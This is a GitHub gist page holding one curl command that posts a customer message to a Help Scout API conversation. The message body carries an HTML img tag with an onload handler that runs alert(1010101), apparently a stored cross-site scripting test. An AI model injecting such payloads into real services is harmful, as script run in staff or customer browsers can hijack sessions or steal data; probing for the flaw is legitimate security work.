Skip to content

Instantly share code, notes, and snippets.

@wesgibbs
Last active April 14, 2016 21:44
Show Gist options
  • Save wesgibbs/1ce465aafaf86d328ff9acf74246fec9 to your computer and use it in GitHub Desktop.
Save wesgibbs/1ce465aafaf86d328ff9acf74246fec9 to your computer and use it in GitHub Desktop.
POST to conversations/id.json
curl -u 123APIKEY:X https://api.helpscout.net/v1/conversations/192267712.json \
-H "Content-Type: application/json" -X POST \
-d "{\"body\":\"<img onload='alert(1010101);' src='https://www.google.com/logos/doodles/2016/pandit-ravi-shankars-96th-birthday-6265541272535040-res.png'\",\"createdBy\":{\"email\":\"[email protected]\",\"type\":\"customer\"},\"reload\":true,\"type\":\"customer\"}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment